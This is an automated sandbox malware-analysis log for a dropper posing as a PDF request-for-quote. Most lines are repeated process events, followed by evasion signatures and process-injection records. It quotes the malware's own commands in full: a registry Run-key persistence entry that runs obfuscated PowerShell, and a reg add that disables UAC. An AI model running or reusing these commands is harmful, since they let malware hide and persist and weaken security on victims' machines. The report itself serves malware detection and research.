            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeAPI/Special instruction interceptor: Address: 4474084
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C3034C sldt word ptr [eax]7_2_22C3034C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6965Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2831Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeWindow / User API: threadDelayed 2414Jump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\nsDialogs.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeAPI coverage: 3.2 %
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeAPI coverage: 10.0 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe TID: 2068Thread sleep count: 2414 > 30Jump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 4868Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeThread sleep count: Count: 2414 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_0040646B FindFirstFileA,FindClose,7_2_0040646B
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_004027A1 FindFirstFileA,7_2_004027A1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,7_2_004058BF
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_22C210F1
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C26580 FindFirstFileExA,7_2_22C26580
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_00418981 memset,GetSystemInfo,17_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\kilns\Unobtainably\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\kilns\Unobtainably\Drivvaades\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\kilns\Jump to behavior
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.0000000006120000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2584577251.000001BFC145B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2582639060.000001BFBBE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW m
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3064
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3237
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeAPI call chain: ExitProcess graph end nodegraph_18-34076
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0360D420 LdrInitializeThunk,2_2_0360D420
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22C22639
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,17_2_004044A4
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C24AB4 mov eax, dword ptr fs:[00000030h]7_2_22C24AB4
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C2724E GetProcessHeap,7_2_22C2724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22C22639
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_22C22B1C
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22C260E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe base: 16C0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe base: 19FFF4Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "preoccupant" /t reg_expand_sz /d "%stableres% -windowstyle minimized $netbrum=(get-itemproperty -path 'hkcu:\toponymist\').berufsverbots;%stableres% ($netbrum)"
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "preoccupant" /t reg_expand_sz /d "%stableres% -windowstyle minimized $netbrum=(get-itemproperty -path 'hkcu:\toponymist\').berufsverbots;%stableres% ($netbrum)"Jump to behavior
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>$~
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\,$
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr]
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageroz
            Source: Fatherhoods.exe, 00000007.00000002.2602798780.0000000022CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\H$h
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\*
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: Fatherhoods.exe, 00000007.00000002.2602798780.0000000022CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerder7$q
